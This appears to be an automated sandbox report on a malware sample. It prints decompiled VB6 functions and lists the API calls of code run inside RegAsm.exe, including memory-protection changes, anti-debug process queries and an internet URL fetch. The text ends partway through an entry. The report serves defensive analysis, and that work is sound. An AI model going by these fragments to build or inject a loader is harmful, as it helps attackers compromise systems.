0x0040ea49
0x0040ea49
0x0040ea4b
0x0040ea50
0x0040ea53
0x0040ea56
0x0040ea5b
0x0040ea5b
0x0040ea68
0x0040ea6f
0x0040ea6f
0x0040ea77
0x0040ea78
0x0040ea7d
0x0040ea80
0x0040ea81
0x0040ea8b
0x0040ea93
0x0040ea98
0x0040ea99
0x0040eab4
0x0040eab9

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040E997
__vbaR8Str.MSVBVM60(00402F9C,?,?,?,?,004013B6), ref: 0040E9AE
__vbaNew2.MSVBVM60(00402D40,00410438,00402F9C,?,?,?,?,004013B6), ref: 0040E9D5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,0000001C,?,?,?,?,?,?,?,?,?,?,00402F9C), ref: 0040EA19
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D50,00000064,?,?,?,?,?,?,?,?,?,?,00402F9C), ref: 0040EA56
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00402F9C), ref: 0040EA6F
#612.MSVBVM60(?,00402F9C,?,?,?,?,004013B6), ref: 0040EA78
__vbaStrVarMove.MSVBVM60(?,?,00402F9C,?,?,?,?,004013B6), ref: 0040EA81
__vbaStrMove.MSVBVM60(?,?,00402F9C,?,?,?,?,004013B6), ref: 0040EA8B
__vbaFreeVar.MSVBVM60(?,?,00402F9C,?,?,?,?,004013B6), ref: 0040EA93
__vbaFreeStr.MSVBVM60(0040EABA,?,?,00402F9C,?,?,?,?,004013B6), ref: 0040EAB4

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#612ChkstkNew2
String ID:
API String ID: 2018086050-0
Opcode ID: dc532eb83230d4b7aa974ca7d6c5fdab0d994b3f5780c1e7ea3716115eb2194e
Instruction ID: d5bbb132db9e17c9d0a9500cbe83f537caca2657c67a686188265c1aac2d7451
Opcode Fuzzy Hash: dc532eb83230d4b7aa974ca7d6c5fdab0d994b3f5780c1e7ea3716115eb2194e
Instruction Fuzzy Hash: 2531E670E00218EFDB00EBA5D986B9EBBB4FF08704F20452AF101BB2E1D7B859559B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD8A, Relevance: 12.1, APIs: 8, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DD8A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v36;
				char _v44;
				char _v60;
				intOrPtr _v100;
				char _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				short _t55;
				signed int _t58;
				signed int _t64;
				void* _t72;
				void* _t74;
				intOrPtr _t75;

				_t75 = _t74 - 0xc;
				 *[fs:0x0] = _t75;
				L004013B0();
				_v16 = _t75;
				_v12 = 0x401260;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4013b6, _t72);
				_v36 = 9;
				_v44 = 2;
				_push( &_v44);
				_push( &_v60);
				L004014BE();
				_v100 = 0xb;
				_v108 = 0x8002;
				_push( &_v60);
				_t55 =  &_v108;
				_push(_t55);
				L004014E2();
				_v112 = _t55;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401536();
				_t58 = _v112;
				if(_t58 != 0) {
					if( *0x410438 != 0) {
						_v136 = 0x410438;
					} else {
						_push(0x410438);
						_push(0x402d40);
						L0040156C();
						_v136 = 0x410438;
					}
					_v112 =  *_v136;
					_t64 =  *((intOrPtr*)( *_v112 + 0x1c))(_v112,  &_v28);
					asm("fclex");
					_v116 = _t64;
					if(_v116 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402d30);
						_push(_v112);
						_push(_v116);
						L00401596();
						_v140 = _t64;
					}
					_v120 = _v28;
					_t58 =  *((intOrPtr*)( *_v120 + 0x50))(_v120);
					asm("fclex");
					_v124 = _t58;
					if(_v124 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x402d50);
						_push(_v120);
						_push(_v124);
						L00401596();
						_v144 = _t58;
					}
					L0040154E();
				}
				_push(0x40df02);
				return _t58;
			}

0x0040dd8d
0x0040dd9c
0x0040dda6
0x0040ddae
0x0040ddb1
0x0040ddb8
0x0040ddc7
0x0040ddca
0x0040ddd1
0x0040dddb
0x0040dddf
0x0040dde0
0x0040dde5
0x0040ddec
0x0040ddf6
0x0040ddf7
0x0040ddfa
0x0040ddfb
0x0040de00
0x0040de07
0x0040de0b
0x0040de0c
0x0040de0e
0x0040de16
0x0040de1c
0x0040de29
0x0040de46
0x0040de2b
0x0040de2b
0x0040de30
0x0040de35
0x0040de3a
0x0040de3a
0x0040de58
0x0040de67
0x0040de6a
0x0040de6c
0x0040de73
0x0040de8f
0x0040de75
0x0040de75
0x0040de77
0x0040de7c
0x0040de7f
0x0040de82
0x0040de87
0x0040de87
0x0040de99
0x0040dea4
0x0040dea7
0x0040dea9
0x0040deb0
0x0040decc
0x0040deb2
0x0040deb2
0x0040deb4
0x0040deb9
0x0040debc
0x0040debf
0x0040dec4
0x0040dec4
0x0040ded6
0x0040ded6
0x0040dedb
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040DDA6
#575.MSVBVM60(?,00000002), ref: 0040DDE0
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 0040DDFB
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?), ref: 0040DE0E
__vbaNew2.MSVBVM60(00402D40,00410438,?,?,004013B6), ref: 0040DE35
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,0000001C), ref: 0040DE82
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D50,00000050), ref: 0040DEBF
__vbaFreeObj.MSVBVM60(00000000,?,00402D50,00000050), ref: 0040DED6

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#575ChkstkListNew2
String ID:
API String ID: 2996698483-0
Opcode ID: e38cb68ae0167cf947c3d6bc2894104e292ce58827c64478c423a36f36a048f7
Instruction ID: 0a8a803e14c1aca4c5cc6592e7cd9c9b17e8dd7a7ccdfeecca61029d7e0c23c1
Opcode Fuzzy Hash: e38cb68ae0167cf947c3d6bc2894104e292ce58827c64478c423a36f36a048f7
Instruction Fuzzy Hash: 2141EA71D00618EFDB10DFA1C989BDEBBB8BF04704F10416AE105BB2A1D7785989DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F1A0, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040F1A0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				intOrPtr _v36;
				char _v44;
				char _v60;
				intOrPtr _v100;
				char _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				short _t49;
				signed int _t52;
				signed int _t58;
				intOrPtr _t69;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t69;
				_push(0x78);
				L004013B0();
				_v12 = _t69;
				_v8 = 0x401360;
				_v36 = 9;
				_v44 = 2;
				_push( &_v44);
				_push( &_v60);
				L004014BE();
				_v100 = 0xb;
				_v108 = 0x8002;
				_push( &_v60);
				_t49 =  &_v108;
				_push(_t49);
				L004014E2();
				_v112 = _t49;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401536();
				_t52 = _v112;
				if(_t52 != 0) {
					if( *0x410438 != 0) {
						_v132 = 0x410438;
					} else {
						_push(0x410438);
						_push(0x402d40);
						L0040156C();
						_v132 = 0x410438;
					}
					_v112 =  *_v132;
					_t58 =  *((intOrPtr*)( *_v112 + 0x1c))(_v112,  &_v28);
					asm("fclex");
					_v116 = _t58;
					if(_v116 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402d30);
						_push(_v112);
						_push(_v116);
						L00401596();
						_v136 = _t58;
					}
					_v120 = _v28;
					_t52 =  *((intOrPtr*)( *_v120 + 0x50))(_v120);
					asm("fclex");
					_v124 = _t52;
					if(_v124 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x402d50);
						_push(_v120);
						_push(_v124);
						L00401596();
						_v140 = _t52;
					}
					L0040154E();
				}
				_v24 =  *0x401358;
				asm("wait");
				_push(0x40f306);
				return _t52;
			}

0x0040f1a5
0x0040f1b0
0x0040f1b1
0x0040f1b8
0x0040f1bb
0x0040f1c3
0x0040f1c6
0x0040f1cd
0x0040f1d4
0x0040f1de
0x0040f1e2
0x0040f1e3
0x0040f1e8
0x0040f1ef
0x0040f1f9
0x0040f1fa
0x0040f1fd
0x0040f1fe
0x0040f203
0x0040f20a
0x0040f20e
0x0040f20f
0x0040f211
0x0040f219
0x0040f21f
0x0040f22c
0x0040f246
0x0040f22e
0x0040f22e
0x0040f233
0x0040f238
0x0040f23d
0x0040f23d
0x0040f252
0x0040f261
0x0040f264
0x0040f266
0x0040f26d
0x0040f289
0x0040f26f
0x0040f26f
0x0040f271
0x0040f276
0x0040f279
0x0040f27c
0x0040f281
0x0040f281
0x0040f293
0x0040f29e
0x0040f2a1
0x0040f2a3
0x0040f2aa
0x0040f2c6
0x0040f2ac
0x0040f2ac
0x0040f2ae
0x0040f2b3
0x0040f2b6
0x0040f2b9
0x0040f2be
0x0040f2be
0x0040f2d0
0x0040f2d0
0x0040f2db
0x0040f2de
0x0040f2df
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040F1BB
#575.MSVBVM60(?,00000002,?,?,?,?,?,?,?,004013B6), ref: 0040F1E3
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 0040F1FE
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?), ref: 0040F211
__vbaNew2.MSVBVM60(00402D40,00410438), ref: 0040F238
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D30,0000001C), ref: 0040F27C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D50,00000050), ref: 0040F2B9
__vbaFreeObj.MSVBVM60 ref: 0040F2D0

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#575ChkstkListNew2
String ID:
API String ID: 2996698483-0
Opcode ID: 0d68d7ac24c32ccca34f2110f43c341cf54612e5732497c6d04ba5870d14ff1a
Instruction ID: 520127456eef997c3acc285788d61351373b18fe0cdc4718adc76063cec81238
Opcode Fuzzy Hash: 0d68d7ac24c32ccca34f2110f43c341cf54612e5732497c6d04ba5870d14ff1a
Instruction Fuzzy Hash: 75410870D00218AFDB20DFA1C986BDDBBB8BB04704F20417AE105BB1A1D7B85588CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F73E, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040F73E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				short _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				void* _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v84;
				signed int _v88;
				short _t31;
				char* _t35;
				signed int _t39;
				short _t40;
				intOrPtr _t52;

				_push(0x4013b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(0x44);
				L004013B0();
				_v12 = _t52;
				_v8 = 0x4013a0;
				_v40 = 0x80020004;
				_v48 = 0xa;
				_t31 =  &_v48;
				_push(_t31);
				L00401446();
				_v24 = _t31;
				L0040155A();
				if( *0x410010 != 0) {
					_v84 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x401d7c);
					L0040156C();
					_v84 = 0x410010;
				}
				_t35 =  &_v32;
				L00401572();
				_v72 = _t35;
				_t39 =  *((intOrPtr*)( *_v72 + 0xe8))(_v72,  &_v68, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x30c))( *_v84));
				asm("fclex");
				_v76 = _t39;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x402d00);
					_push(_v72);
					_push(_v76);
					L00401596();
					_v88 = _t39;
				}
				_t40 = _v68;
				_v28 = _t40;
				L0040154E();
				_push(0x40f83a);
				return _t40;
			}

0x0040f743
0x0040f74e
0x0040f74f
0x0040f756
0x0040f759
0x0040f761
0x0040f764
0x0040f76b
0x0040f772
0x0040f779
0x0040f77c
0x0040f77d
0x0040f782
0x0040f789
0x0040f795
0x0040f7af
0x0040f797
0x0040f797
0x0040f79c
0x0040f7a1
0x0040f7a6
0x0040f7a6
0x0040f7ca
0x0040f7ce
0x0040f7d3
0x0040f7e2
0x0040f7e8
0x0040f7ea
0x0040f7f1
0x0040f80d
0x0040f7f3
0x0040f7f3
0x0040f7f8
0x0040f7fd
0x0040f800
0x0040f803
0x0040f808
0x0040f808
0x0040f811
0x0040f815
0x0040f81c
0x0040f821
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040F759
#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,004013B6), ref: 0040F77D
__vbaFreeVar.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,004013B6), ref: 0040F789
__vbaNew2.MSVBVM60(00401D7C,00410010,0000000A,?,?,?,?,?,?,?,?,004013B6), ref: 0040F7A1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0000000A), ref: 0040F7CE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D00,000000E8,?,?,?,?,?,?,?,?,0000000A), ref: 0040F803
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0000000A), ref: 0040F81C

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#648CheckChkstkHresultNew2
String ID:
API String ID: 2278745081-0
Opcode ID: 01a0c34e59dc5711d9ca7f98f53852c516aba1ed80703b0816cfc0748368edaa
Instruction ID: 8e65ca4a624125e41483161c80a0ec2435efc5d95c569643787951839ce85ce7
Opcode Fuzzy Hash: 01a0c34e59dc5711d9ca7f98f53852c516aba1ed80703b0816cfc0748368edaa
Instruction Fuzzy Hash: 5121F775900248EFCB10DFE4C945BDDBBB8BF08704F20853AE102BB6A0D7B86949CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF21, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040DF21(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t19;
				signed int* _t21;
				signed int _t26;

				_push(0x10);
				L004013B0();
				_v12 =  *0x401200;
				_t26 =  *0x401200;
				_v20 = _t26;
				asm("fldz");
				 *_t21 = _t26;
				L004014B2();
				L004014B8();
				asm("fcomp qword [0x401278]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_t19 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v16 = _t19;
					if(_v16 >= 0) {
						_t9 =  &_v20;
						 *_t9 = _v20 & 0x00000000;
						__eflags =  *_t9;
					} else {
						_push(0x710);
						_push(0x4024e8);
						_push(_a4);
						_push(_v16);
						L00401596();
						_v20 = _t19;
					}
				}
				_v12 =  *0x401270;
				 *_a8 = _v12;
				return 0;
			}

0x0040df24
0x0040df27
0x0040df34
0x0040df37
0x0040df3f
0x0040df42
0x0040df46
0x0040df49
0x0040df4e
0x0040df53
0x0040df59
0x0040df5b
0x0040df5c
0x0040df66
0x0040df6c
0x0040df73
0x0040df8f
0x0040df8f
0x0040df8f
0x0040df75
0x0040df75
0x0040df7a
0x0040df7f
0x0040df82
0x0040df85
0x0040df8a
0x0040df8a
0x0040df73
0x0040df99
0x0040dfa2
0x0040dfa7

APIs

__vbaChkstk.MSVBVM60 ref: 0040DF27
#671.MSVBVM60 ref: 0040DF49
__vbaFpR8.MSVBVM60 ref: 0040DF4E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004024E8,00000710), ref: 0040DF85

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#671CheckChkstkHresult
String ID:
API String ID: 3438959223-0
Opcode ID: 57af3350d3f64c0f5e95ebbda98f18e0cdab8236517e3f4411255ef3f0bec1cf
Instruction ID: 0c73e031953ca6bbd92a358e25f0e4072ffe5bf5b962d07f3d7949c97e6be676
Opcode Fuzzy Hash: 57af3350d3f64c0f5e95ebbda98f18e0cdab8236517e3f4411255ef3f0bec1cf
Instruction Fuzzy Hash: 79015270800509FFDB006F91DC49AAEBBB4FB08345F008ABEF481B61F0CBB955648B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8E0, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040E8E0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t15;
				void* _t22;
				void* _t24;
				intOrPtr _t25;

				_t25 = _t24 - 0xc;
				 *[fs:0x0] = _t25;
				L004013B0();
				_v16 = _t25;
				_v12 = 0x4012e0;
				_v8 = 0;
				_t15 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4013b6, _t22);
				_push(0);
				_push(1);
				L0040147C();
				L00401548();
				_v36 = 0x738aae0;
				_v32 = 0x5afd;
				_push(0x40e94f);
				L00401512();
				return _t15;
			}

0x0040e8e3
0x0040e8f2
0x0040e8fc
0x0040e904
0x0040e907
0x0040e90e
0x0040e91d
0x0040e920
0x0040e922
0x0040e924
0x0040e92e
0x0040e933
0x0040e93a
0x0040e941
0x0040e949
0x0040e94e

APIs

__vbaChkstk.MSVBVM60(?,004013B6), ref: 0040E8FC
#707.MSVBVM60(00000001,00000000,?,?,?,?,004013B6), ref: 0040E924
__vbaStrMove.MSVBVM60(00000001,00000000,?,?,?,?,004013B6), ref: 0040E92E
__vbaFreeStr.MSVBVM60(0040E94F,00000001,00000000), ref: 0040E949

Memory Dump Source

Source File: 00000000.00000002.323506492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.323500903.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.323528329.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.323533035.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#707ChkstkFreeMove
String ID:
API String ID: 2104104847-0
Opcode ID: b205354910cdb23a651951f1ce8a1696997498bb089e443af41fcd96488b94bb
Instruction ID: a2b65272045984039e3aca44542147a33298fa8576b73b98c514149abc3e9df0
Opcode Fuzzy Hash: b205354910cdb23a651951f1ce8a1696997498bb089e443af41fcd96488b94bb
Instruction Fuzzy Hash: FCF062B0A40208BBDB00EF95CD86F8EBFB4AB04744F10802AB5017B2E1D7BC5504CB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6328 Parent PID: 3784 RegAsm.exeCOMMON

Executed Functions

Function 00C23BC4, Relevance: 1.6, APIs: 1, Instructions: 96nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00C23CAA

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 0af6c8e097f98175522c9efc22018388d5aeb12ec0b1da8a8c31c10a4ef2a8b6
Instruction ID: 58a9d3a0c1e59361db18ad2a02bb022d98e1b65ecf8a30866d83f54788098832
Opcode Fuzzy Hash: 0af6c8e097f98175522c9efc22018388d5aeb12ec0b1da8a8c31c10a4ef2a8b6
Instruction Fuzzy Hash: 5E313834301B6A8EFB1D9E38D9543A632A2AF55321F58433CDC62964D1C37CCAC4C700

Uniqueness

Uniqueness Score: -1.00%

Function 00C236EE, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00C2346E,00000040,00C216EA,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C23707

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E6B1F, Relevance: 6.1, APIs: 4, Instructions: 138threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 1D9E6BB0
GetCurrentThread.KERNEL32 ref: 1D9E6BED
GetCurrentProcess.KERNEL32 ref: 1D9E6C2A
GetCurrentThreadId.KERNEL32 ref: 1D9E6C83

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 984ffd68f21ee14b9aa107d1a5fdf5d2b614a109483318674cafa77a975fe419
Instruction ID: d9325c54069f9b997f145ed6ec9b80f64b3f30d4c39588fcaf5eb445720addc9
Opcode Fuzzy Hash: 984ffd68f21ee14b9aa107d1a5fdf5d2b614a109483318674cafa77a975fe419
Instruction Fuzzy Hash: E05177B09053489FDB01DFA9C584BDEBBF0AF59314F10849EE049A7761D779A844CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E6B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 1D9E6BB0
GetCurrentThread.KERNEL32 ref: 1D9E6BED
GetCurrentProcess.KERNEL32 ref: 1D9E6C2A
GetCurrentThreadId.KERNEL32 ref: 1D9E6C83

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e2ae933f7643d139e482df9f64bce34be3e7994fa6f4b5a03f8b4b0996125091
Instruction ID: 90abad6ddc5e937578fdab26401b9a0d44f1c5d98df81357d97f4c96dba9a448
Opcode Fuzzy Hash: e2ae933f7643d139e482df9f64bce34be3e7994fa6f4b5a03f8b4b0996125091
Instruction Fuzzy Hash: BB5133B09007489FDB11CFA9C584BDEBBF1BF58314F20845DE50AA7760D779A844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C22100, Relevance: 3.1, APIs: 2, Instructions: 106networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00C22566,00000000,00000000,00000000,00000000), ref: 00C22119
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00C22191

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 5484bfbd1d82b259d9c403ba6923ff12b1d40204e18179f94c437a71170d1b0c
Instruction ID: 415964072cc551038b6b1d4a2f97e1c3771af46379d8496cfd63dd2d463769e7
Opcode Fuzzy Hash: 5484bfbd1d82b259d9c403ba6923ff12b1d40204e18179f94c437a71170d1b0c
Instruction Fuzzy Hash: FA41923034438BABFF306E21DD55FEE36A6AF04340F948429ED4ADA990DB71DA489B11

Uniqueness

Uniqueness Score: -1.00%

Function 00C2132B, Relevance: 1.7, APIs: 1, Instructions: 183threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00C21378

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f9572928f5f044f27b7de5b27cd1a09c6a901c43c0a793eaa160edbf6aa473ec
Instruction ID: cbfefa2a574bd4e1ca0d9344049d56d82ecfa8538424dcc443cb53b2a05d2495
Opcode Fuzzy Hash: f9572928f5f044f27b7de5b27cd1a09c6a901c43c0a793eaa160edbf6aa473ec
Instruction Fuzzy Hash: 0D515970501394AFCB049F20E99ABCA7B62EF16351F640289ED528F9E3D731C9C5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C2129F, Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00C21378

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 8cd57ee85b4deb7446fdff661df308a7b464e721dc02d278369574a07aca8513
Instruction ID: 07a3d9fc8a4f83321e377878d00c1ca0b9cbd7ade51d0c79b2fa06b361d4ae41
Opcode Fuzzy Hash: 8cd57ee85b4deb7446fdff661df308a7b464e721dc02d278369574a07aca8513
Instruction Fuzzy Hash: 67119BB0240394AFDB205F549EE6B9A73969F26720F790385ED628BCF3C325C8C4C221

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E5184, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D9E52A2

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d2474a05439267e3aa23b071a53905fc48489471dc1e642e3c2097ba86e452ac
Instruction ID: 8477b5911fbcfa440340dade52cabdb89e1c8a259080742f3d47b18c336ce2c8
Opcode Fuzzy Hash: d2474a05439267e3aa23b071a53905fc48489471dc1e642e3c2097ba86e452ac
Instruction Fuzzy Hash: C651CEB1C10349DFDB15CFA9C880ADEBBB5BF88354F20852AE819AB210D775A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E5190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D9E52A2

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 624f3e8b68f45b8100b81d53d4efcae41c237deeadb823879c84ba826422c944
Instruction ID: 3d82362392592c06b9bec97f47d49b1c0e2340153ef9ca2631ce7e93f97fc709
Opcode Fuzzy Hash: 624f3e8b68f45b8100b81d53d4efcae41c237deeadb823879c84ba826422c944
Instruction Fuzzy Hash: C841DEB1C00349DFDF15CFA9C880ADEBBB5BF88354F20812AE819AB210D775A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E6964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1D9E7CF9

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
